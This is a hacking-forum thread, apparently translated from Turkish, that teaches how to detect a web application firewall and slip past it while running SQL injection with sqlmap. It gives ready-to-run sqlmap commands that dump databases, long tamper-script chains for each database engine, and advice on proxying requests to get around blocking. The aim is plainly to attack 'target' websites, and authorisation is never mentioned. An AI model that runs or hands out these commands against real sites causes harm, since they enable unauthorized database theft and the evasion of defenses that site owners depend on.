What is WAF And How Can We Bypass It With SQLMap Functions

Elflatus

Yeni üye
6 May 2019
23
0
Anadolu
VRUQn.png


What Is Waf? How Can We Bypass It?


Hello to you dear members of the Turk Hack Team. In this article, we will learn how can we bypass WAF by using --tamper function in SQLMap.

Firstly, What is this WAF?


VCuw7.png




Web Application Firewall (WAF), shortly web firewall. This wall blocks the traffic that seems anormal, does detailed package analysis and blocks harmful requests sended by attacker, wall does these by examining complex traffic. Well, how can we bypass it? We will do that by using SQLMap.

How To Detect WAF On The Website?

Opening terminal and using wafw00f command would be enough.

Kod:
[COLOR=White][SIZE=4][FONT=Trebuchet MS][B][SIZE=4][COLOR=White]wafw00f http://website.com[/COLOR][/SIZE][/B][/FONT][/SIZE][/COLOR]
VCWqY.jpg



As you can see our target website is protected by ModSecurity (SpiderLabs) WAF.


What Does --tamper Function Do?

Let's say you have found a website and tried to pull the database by doing sqlmap -u targetwebsite.com --dbs. Then you saw the website is protected by WAF and SQLMap wasn't be able to pull the database because of WAF. First, we should detect WAF, we must find out that is it using Linux system, or is it using Windows system. Then we will choose our bypass according to the firewall that is used in this system. There are lots of bypass scripts in the tamper folder that inside of SQLMap folder.



VCtac.png


They all have different purposes so we can't use them randomly.


Usage Of --tamper Function

It has so simple usage after we find the bypass script that we will use. We will add --tamper "bypass script name" to the last part of the command line.
Kod:
[COLOR=White][SIZE=4][FONT=Trebuchet MS][B][SIZE=4][COLOR=White]sqlmap -u www.website.com/page.php?id=7 --tamper "escapequotes" --dbs[/COLOR][/SIZE][/B][/FONT][/SIZE][/COLOR]
This is how we bypass WAF. Thanks for reading.

Source: Waf Nedir ve SQLMap Fonksiyonlarıyla Nasıl Atlatılır?


Translator: Elflatus
 
Son düzenleme:

Kasem

Üye
24 Nis 2015
155
21
Hiçlik
Hello first of all thanks, but let me ask this when we detected the WAF's kind then how we are going to know which tamper is best for that specific WAF? Is the tamper named as same as waf?
 

Elflatus

Yeni üye
6 May 2019
23
0
Anadolu
Hello first of all thanks, but let me ask this when we detected the WAF's kind then how we are going to know which tamper is best for that specific WAF? Is the tamper named as same as waf?


Like I said in the article, they have their own purposes. We can gather them into titles, and we can use many of them in one line.



General Scripts :
--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes


Microsoft Access :
--tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords


Microsoft SQL Server :
--tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes


MySQL :
--tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor


Oracle :
--tamper=between,charencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes,xforwardedfor


PostgreSQL :
--tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,xforwardedfor


SAP MaxDB :
--tamper=ifnull2ifisnull,nonrecursivereplacement,randomcase,securesphere,space2comment,space2plus,unionalltounion,unmagicquotes,xforwardedfor


SQLite :
--tamper=ifnull2ifisnull,multiplespaces,nonrecursivereplacement,randomcase,securesphere,space2comment,space2dash,space2plus,unionalltounion,unmagicquotes,xforwardedfor






 
Son düzenleme:

Kasem

Üye
24 Nis 2015
155
21
Hiçlik
Like I said in the article, they have their own purposes. We can gather them into titles, and we can use many of them in one line.



General Scripts :
--tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes


Microsoft Access :
--tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords


Microsoft SQL Server :
--tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes


MySQL :
--tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor


Oracle :
--tamper=between,charencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes,xforwardedfor


PostgreSQL :
--tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,xforwardedfor


SAP MaxDB :
--tamper=ifnull2ifisnull,nonrecursivereplacement,randomcase,securesphere,space2comment,space2plus,unionalltounion,unmagicquotes,xforwardedfor


SQLite :
--tamper=ifnull2ifisnull,multiplespaces,nonrecursivereplacement,randomcase,securesphere,space2comment,space2dash,space2plus,unionalltounion,unmagicquotes,xforwardedfor







Thank you, cab you also tell me how to use proxy too when I target the url after a while it says connection refused.
 

Elflatus

Yeni üye
6 May 2019
23
0
Anadolu
Thank you, cab you also tell me how to use proxy too when I target the url after a while it says connection refused.
You can use Proxy with --proxy parameter. Your Proxy must be HTTP type. Then just add --proxy.
Kod:
[COLOR=White][SIZE=4][FONT=Trebuchet MS][B][SIZE=4][COLOR=White]sqlmap -u www.website.com/page.php?id=7 --proxy=[/COLOR][/SIZE][/B][/FONT][/SIZE][/COLOR][COLOR=White][SIZE=4][FONT=Trebuchet MS][B][SIZE=4][COLOR=White]http://127.0.0.1 --tamper "tamperscript" --dbs[/COLOR][/SIZE][/B][/FONT][/SIZE][/COLOR]
 
Son düzenleme:

M3m0ry

Kıdemli Üye
3 Haz 2017
4,429
124
3
xD
Congratulations. Legend topic .:RpS_thumbup: :RpS_thumbup:​
 
Son düzenleme:

Kasem

Üye
24 Nis 2015
155
21
Hiçlik
I really am appreciatied hope fully on your next article you talk about level and risk and random agent parameters well done 👏
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.